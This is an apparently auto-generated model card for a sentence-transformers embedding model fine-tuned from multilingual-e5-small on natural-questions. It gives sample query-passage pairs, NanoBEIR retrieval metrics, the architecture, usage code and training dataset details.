- Cynthia Nixon Cynthia Ellen Nixon (born April 9, 1966) is an American actress.
She is known for her portrayal of Miranda Hobbes in the HBO series, Sex and the
City (1998–2004), for which she won the 2004 Primetime Emmy Award for Outstanding
Supporting Actress in a Comedy Series. She reprised the role in the films Sex
and the City (2008) and Sex and the City 2 (2010). Other film credits include
Amadeus (1984), The Pelican Brief (1993), Little Manhattan (2005), 5 Flights Up
(2014), James White (2015), and playing Emily Dickinson in A Quiet Passion (2016).
- source_sentence: what is the chemical formula of laughing gas
sentences:
- Adversarial system The adversarial system or adversary system is a legal system
used in the common law countries where two advocates represent their parties'
case or position before an impartial person or group of people, usually a jury
or judge, who attempt to determine the truth and pass judgment accordingly.[1][2][3]
It is in contrast to the inquisitorial system used in some civil law systems (i.e.
those deriving from Roman law or the Napoleonic code) where a judge investigates
the case.
- Mercy (Duffy song) "Mercy" is a song performed by Welsh singer Duffy, released
as the second single from her debut studio album, Rockferry (2008). Co-written
by Duffy and Steve Booker and produced by Booker, it was released worldwide in
2008 to critical acclaim and unprecedented chart success. As Duffy's first international
release, the song is credited with firmly establishing her career and is now considered
her signature song. "Mercy" received comparisons to Duffy's previous single, "Rockferry".
Critical reviewers of "Mercy" noted similarities between the song to releases
by Aretha Franklin, Dusty Springfield and The Supremes, as well as contemporaries
such as fellow British singer Amy Winehouse. "Mercy" peaked at number one on the
UK Singles Chart in February 2008, remaining at the top of the chart for five
weeks. The single also topped the charts in Austria, Germany, Greece, the Netherlands,
Norway, Republic of Ireland, Switzerland and Turkey, and peaked within the top
five of the charts in Belgium, Denmark, France, Italy, Japan, New Zealand, Romania,
Spain and Sweden.
- Nitrous oxide Nitrous oxide, commonly known as laughing gas or nitrous,[1] is
a chemical compound, an oxide of nitrogen with the formula N 2O. At room temperature,
it is a colorless non-flammable gas, with a slightly metallic scent and taste.
At elevated temperatures, nitrous oxide is a powerful oxidizer similar to molecular
oxygen.
- source_sentence: comin thro the rye meaning in catcher in the rye
sentences:
- India and the United Nations India was among the original members of the United
Nations that signed the Declaration by United Nations at Washington, D.C. on 1944
October and also participated in the United Nations Conference on International
Organization at San Francisco from 25 April to 26 June 1945. As a founding member
of the United Nations, India strongly supports the purposes and principles of
the UN and has made significant contributions in implementing the goals of the
Charter, and the evolution of the UN's specialised programmes and agencies.[1]
- Dominion of New Zealand In the post-war period, the term ‘Dominion’ has fallen
into disuse. Full independence was granted with the Statute of Westminster in
1931 and adopted by the New Zealand Parliament in 1947.
- Comin' Thro' the Rye The title of the novel The Catcher in the Rye (1951) by J.
D. Salinger comes from the poem's name. Holden Caulfield, the protagonist, misinterprets
a part of this poem to mean "if a body catch a body" rather than "if a body meet
a body." He keeps picturing children playing in a field of rye near the edge of
a cliff, and him catching them when they start to fall off.[8]
- source_sentence: on what basis did the bishop of rome claim authority over other
bishops
sentences:
- Fifty Shades Darker Christian takes Ana to the boathouse, which has been decorated
with flowers and soft lights. He proposes properly with a ring and Ana accepts.
Outside the Greys' mansion, Jack Hyde secretly watches the party; he is the one
who sabotaged Christian's helicopter and he has sworn revenge.
- Role of the United States in the Vietnam War The role of the United States in
the Vietnam War began after World War II and escalated into full commitment during
the Vietnam War from 1955 to 1975.
- Papal primacy Because of its association with the supposed position of Peter among
the Apostles, the function that, within the Roman Catholic Church, is exercised
by the Bishop of Rome among the bishops as a whole is referred to as the Petrine
function, and is generally believed to be of divine institution, in the sense
that the historical and sociological factors that influenced its development are
seen as guided by the Holy Spirit. Not all Roman Catholic theologians see a special
providential providence as responsible for the result, but most see the papacy,
regardless of its origin, as now essential to the Church's structure.[36]
datasets:
- sentence-transformers/natural-questions
pipeline_tag: sentence-similarity
library_name: sentence-transformers
metrics:
- cosine_accuracy@1
- cosine_accuracy@3
- cosine_accuracy@5
- cosine_accuracy@10
- cosine_precision@1
- cosine_precision@3
- cosine_precision@5
- cosine_precision@10
- cosine_recall@1
- cosine_recall@3
- cosine_recall@5
- cosine_recall@10
- cosine_ndcg@10
- cosine_mrr@10
- cosine_map@100
model-index:
- name: SentenceTransformer based on intfloat/multilingual-e5-small
results:
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoClimateFEVER
type: NanoClimateFEVER
metrics:
- type: cosine_accuracy@1
value: 0.2
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.48
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.6
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.72
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.2
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.18
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.14400000000000002
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.10399999999999998
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.10833333333333332
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.239
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.304
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.41133333333333333
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.31048541932822943
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.3614444444444443
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.2390388256023445
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoDBPedia
type: NanoDBPedia
metrics:
- type: cosine_accuracy@1
value: 0.68
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.9
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.92
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.94
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.68
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.5866666666666667
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.5080000000000001
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.43599999999999994
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.086360244024752
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.1666741847802517
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.21438121403297003
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.3104025438299758
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.5587563085491208
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.7916666666666669
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.40805090985112635
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoFEVER
type: NanoFEVER
metrics:
- type: cosine_accuracy@1
value: 0.66
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.88
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.92
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.98
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.66
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.29333333333333333
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.19199999999999995
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.102
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.6266666666666667
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.8466666666666667
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.9033333333333333
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.9433333333333332
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.8017852113833116
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.7740238095238096
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.7482351489090618
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoFiQA2018
type: NanoFiQA2018
metrics:
- type: cosine_accuracy@1
value: 0.38
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.52
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.56
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.72
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.38
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.2333333333333333
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.16399999999999998
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.10399999999999998
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.19874603174603173
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.3268492063492063
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.3609047619047619
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.49229365079365073
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.3959228015337088
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.47713492063492063
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.33252277939048175
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoHotpotQA
type: NanoHotpotQA
metrics:
- type: cosine_accuracy@1
value: 0.76
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.86
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.92
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.94
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.76
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.4133333333333332
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.284
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.146
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.38
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.62
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.71
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.73
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.702847927278439
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.8262222222222223
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.6449812229887003
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoMSMARCO
type: NanoMSMARCO
metrics:
- type: cosine_accuracy@1
value: 0.38
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.56
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.64
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.88
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.38
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.18666666666666668
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.128
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.088
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.38
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.56
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.64
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.88
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.5942056677784402
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.5074603174603174
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.5145092026709674
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoNFCorpus
type: NanoNFCorpus
metrics:
- type: cosine_accuracy@1
value: 0.32
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.44
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.5
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.62
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.32
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.28
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.26799999999999996
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.24799999999999997
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.012478860049424716
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.04039987203152191
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.05777310273396785
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.09431894225488731
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.264566207848617
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.3937222222222222
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.1009051776502821
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoNQ
type: NanoNQ
metrics:
- type: cosine_accuracy@1
value: 0.54
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.64
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.7
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.74
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.54
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.22
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.15200000000000002
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.08
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.51
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.61
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.68
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.72
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.6242150636035374
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.6056666666666667
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.5978891331631784
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoQuoraRetrieval
type: NanoQuoraRetrieval
metrics:
- type: cosine_accuracy@1
value: 0.94
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.96
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 1.0
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 1.0
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.94
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.3999999999999999
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.256
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.13599999999999998
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.8273333333333333
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.9253333333333333
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.976
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.9933333333333334
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.9565745436598582
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.9590000000000001
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.9352719303046889
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoSCIDOCS
type: NanoSCIDOCS
metrics:
- type: cosine_accuracy@1
value: 0.46
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.7
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.78
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.92
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.46
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.3533333333333333
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.28
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.18599999999999997
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.09566666666666666
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.21666666666666665
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.2866666666666666
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.38066666666666665
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.37575085819520465
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.5963809523809522
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.2885384308634827
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoArguAna
type: NanoArguAna
metrics:
- type: cosine_accuracy@1
value: 0.2
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.6
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.7
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.86
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.2
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.2
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.14
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.08599999999999998
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.2
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.6
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.7
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.86
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.5214752971348396
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.41396825396825393
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.4200848216111374
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoSciFact
type: NanoSciFact
metrics:
- type: cosine_accuracy@1
value: 0.52
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.66
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.78
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.8
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.52
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.23333333333333336
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.16799999999999998
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.09
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.485
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.64
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.755
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.79
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.6502419149717973
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.6123333333333334
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.6064036623574295
name: Cosine Map@100
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: NanoTouche2020
type: NanoTouche2020
metrics:
- type: cosine_accuracy@1
value: 0.5510204081632653
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.8163265306122449
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.8775510204081632
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 1.0
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.5510204081632653
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.5374149659863945
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.5020408163265306
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.43061224489795924
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.04049297815629291
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.11569609914870749
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.17697471708626475
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.2847992664462136
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.48122759937817366
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.7012066731454487
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.37319563903770475
name: Cosine Map@100
- task:
type: nano-beir
name: Nano BEIR
dataset:
name: NanoBEIR mean
type: NanoBEIR_mean
metrics:
- type: cosine_accuracy@1
value: 0.5070015698587127
name: Cosine Accuracy@1
- type: cosine_accuracy@3
value: 0.6935635792778648
name: Cosine Accuracy@3
- type: cosine_accuracy@5
value: 0.7613500784929356
name: Cosine Accuracy@5
- type: cosine_accuracy@10
value: 0.8553846153846153
name: Cosine Accuracy@10
- type: cosine_precision@1
value: 0.5070015698587127
name: Cosine Precision@1
- type: cosine_precision@3
value: 0.3167242281527996
name: Cosine Precision@3
- type: cosine_precision@5
value: 0.24508006279434855
name: Cosine Precision@5
- type: cosine_precision@10
value: 0.17204709576138144
name: Cosine Precision@10
- type: cosine_recall@1
value: 0.3039290856905001
name: Cosine Recall@1
- type: cosine_recall@3
value: 0.45440661761356566
name: Cosine Recall@3
- type: cosine_recall@5
value: 0.520387215058305
name: Cosine Recall@5
- type: cosine_recall@10
value: 0.6069600823070304
name: Cosine Recall@10
- type: cosine_ndcg@10
value: 0.5567734477417906
name: Cosine Ndcg@10
- type: cosine_mrr@10
value: 0.6169408063591738
name: Cosine Mrr@10
- type: cosine_map@100
value: 0.47766360649235273
name: Cosine Map@100
---
# SentenceTransformer based on intfloat/multilingual-e5-small
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [intfloat/multilingual-e5-small](https://huggingface.co/intfloat/multilingual-e5-small) on the [natural-questions](https://huggingface.co/datasets/sentence-transformers/natural-questions) dataset. It maps sentences & paragraphs to a 384-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [intfloat/multilingual-e5-small](https://huggingface.co/intfloat/multilingual-e5-small) <!-- at revision c007d7ef6fd86656326059b28395a7a03a7c5846 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 384 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [natural-questions](https://huggingface.co/datasets/sentence-transformers/natural-questions)
- **Language:** en
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'BertModel'})
(1): Pooling({'word_embedding_dimension': 384, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("Caesarisnotasalad/test")
# Run inference
sentences = [
'on what basis did the bishop of rome claim authority over other bishops',
"Papal primacy Because of its association with the supposed position of Peter among the Apostles, the function that, within the Roman Catholic Church, is exercised by the Bishop of Rome among the bishops as a whole is referred to as the Petrine function, and is generally believed to be of divine institution, in the sense that the historical and sociological factors that influenced its development are seen as guided by the Holy Spirit. Not all Roman Catholic theologians see a special providential providence as responsible for the result, but most see the papacy, regardless of its origin, as now essential to the Church's structure.[36]",
"Fifty Shades Darker Christian takes Ana to the boathouse, which has been decorated with flowers and soft lights. He proposes properly with a ring and Ana accepts. Outside the Greys' mansion, Jack Hyde secretly watches the party; he is the one who sabotaged Christian's helicopter and he has sworn revenge.",
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 384]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[ 1.0000, 0.5492, 0.0268],
# [ 0.5492, 1.0000, -0.0234],
# [ 0.0268, -0.0234, 1.0000]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
## Evaluation
### Metrics
#### Information Retrieval
* Datasets: `NanoClimateFEVER`, `NanoDBPedia`, `NanoFEVER`, `NanoFiQA2018`, `NanoHotpotQA`, `NanoMSMARCO`, `NanoNFCorpus`, `NanoNQ`, `NanoQuoraRetrieval`, `NanoSCIDOCS`, `NanoArguAna`, `NanoSciFact` and `NanoTouche2020`
* Evaluated with [<code>InformationRetrievalEvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.InformationRetrievalEvaluator)
| Metric | NanoClimateFEVER | NanoDBPedia | NanoFEVER | NanoFiQA2018 | NanoHotpotQA | NanoMSMARCO | NanoNFCorpus | NanoNQ | NanoQuoraRetrieval | NanoSCIDOCS | NanoArguAna | NanoSciFact | NanoTouche2020 |
|:--------------------|:-----------------|:------------|:-----------|:-------------|:-------------|:------------|:-------------|:-----------|:-------------------|:------------|:------------|:------------|:---------------|
| cosine_accuracy@1 | 0.2 | 0.68 | 0.66 | 0.38 | 0.76 | 0.38 | 0.32 | 0.54 | 0.94 | 0.46 | 0.2 | 0.52 | 0.551 |
| cosine_accuracy@3 | 0.48 | 0.9 | 0.88 | 0.52 | 0.86 | 0.56 | 0.44 | 0.64 | 0.96 | 0.7 | 0.6 | 0.66 | 0.8163 |
| cosine_accuracy@5 | 0.6 | 0.92 | 0.92 | 0.56 | 0.92 | 0.64 | 0.5 | 0.7 | 1.0 | 0.78 | 0.7 | 0.78 | 0.8776 |
| cosine_accuracy@10 | 0.72 | 0.94 | 0.98 | 0.72 | 0.94 | 0.88 | 0.62 | 0.74 | 1.0 | 0.92 | 0.86 | 0.8 | 1.0 |
| cosine_precision@1 | 0.2 | 0.68 | 0.66 | 0.38 | 0.76 | 0.38 | 0.32 | 0.54 | 0.94 | 0.46 | 0.2 | 0.52 | 0.551 |
| cosine_precision@3 | 0.18 | 0.5867 | 0.2933 | 0.2333 | 0.4133 | 0.1867 | 0.28 | 0.22 | 0.4 | 0.3533 | 0.2 | 0.2333 | 0.5374 |
| cosine_precision@5 | 0.144 | 0.508 | 0.192 | 0.164 | 0.284 | 0.128 | 0.268 | 0.152 | 0.256 | 0.28 | 0.14 | 0.168 | 0.502 |
| cosine_precision@10 | 0.104 | 0.436 | 0.102 | 0.104 | 0.146 | 0.088 | 0.248 | 0.08 | 0.136 | 0.186 | 0.086 | 0.09 | 0.4306 |
| cosine_recall@1 | 0.1083 | 0.0864 | 0.6267 | 0.1987 | 0.38 | 0.38 | 0.0125 | 0.51 | 0.8273 | 0.0957 | 0.2 | 0.485 | 0.0405 |
| cosine_recall@3 | 0.239 | 0.1667 | 0.8467 | 0.3268 | 0.62 | 0.56 | 0.0404 | 0.61 | 0.9253 | 0.2167 | 0.6 | 0.64 | 0.1157 |
| cosine_recall@5 | 0.304 | 0.2144 | 0.9033 | 0.3609 | 0.71 | 0.64 | 0.0578 | 0.68 | 0.976 | 0.2867 | 0.7 | 0.755 | 0.177 |
| cosine_recall@10 | 0.4113 | 0.3104 | 0.9433 | 0.4923 | 0.73 | 0.88 | 0.0943 | 0.72 | 0.9933 | 0.3807 | 0.86 | 0.79 | 0.2848 |
| **cosine_ndcg@10** | **0.3105** | **0.5588** | **0.8018** | **0.3959** | **0.7028** | **0.5942** | **0.2646** | **0.6242** | **0.9566** | **0.3758** | **0.5215** | **0.6502** | **0.4812** |
| cosine_mrr@10 | 0.3614 | 0.7917 | 0.774 | 0.4771 | 0.8262 | 0.5075 | 0.3937 | 0.6057 | 0.959 | 0.5964 | 0.414 | 0.6123 | 0.7012 |
| cosine_map@100 | 0.239 | 0.4081 | 0.7482 | 0.3325 | 0.645 | 0.5145 | 0.1009 | 0.5979 | 0.9353 | 0.2885 | 0.4201 | 0.6064 | 0.3732 |
#### Nano BEIR
* Dataset: `NanoBEIR_mean`
* Evaluated with [<code>NanoBEIREvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.NanoBEIREvaluator) with these parameters:
```json
{
"dataset_names": [
"climatefever",
"dbpedia",
"fever",
"fiqa2018",
"hotpotqa",
"msmarco",
"nfcorpus",
"nq",
"quoraretrieval",
"scidocs",
"arguana",
"scifact",
"touche2020"
]
}
```
| Metric | Value |
|:--------------------|:-----------|
| cosine_accuracy@1 | 0.507 |
| cosine_accuracy@3 | 0.6936 |
| cosine_accuracy@5 | 0.7614 |
| cosine_accuracy@10 | 0.8554 |
| cosine_precision@1 | 0.507 |
| cosine_precision@3 | 0.3167 |
| cosine_precision@5 | 0.2451 |
| cosine_precision@10 | 0.172 |
| cosine_recall@1 | 0.3039 |
| cosine_recall@3 | 0.4544 |
| cosine_recall@5 | 0.5204 |
| cosine_recall@10 | 0.607 |
| **cosine_ndcg@10** | **0.5568** |
| cosine_mrr@10 | 0.6169 |
| cosine_map@100 | 0.4777 |
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### natural-questions
* Dataset: [natural-questions](https://huggingface.co/datasets/sentence-transformers/natural-questions) at [f9e894e](https://huggingface.co/datasets/sentence-transformers/natural-questions/tree/f9e894e1081e206e577b4eaa9ee6de2b06ae6f17)
* Size: 100,231 training samples
* Columns: <code>anchor</code> and <code>positive</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive |
|:--------|:-----------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 10 tokens</li><li>mean: 13.24 tokens</li><li>max: 24 tokens</li></ul> | <ul><li>min: 19 tokens</li><li>mean: 148.48 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor | positive |
|:----------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
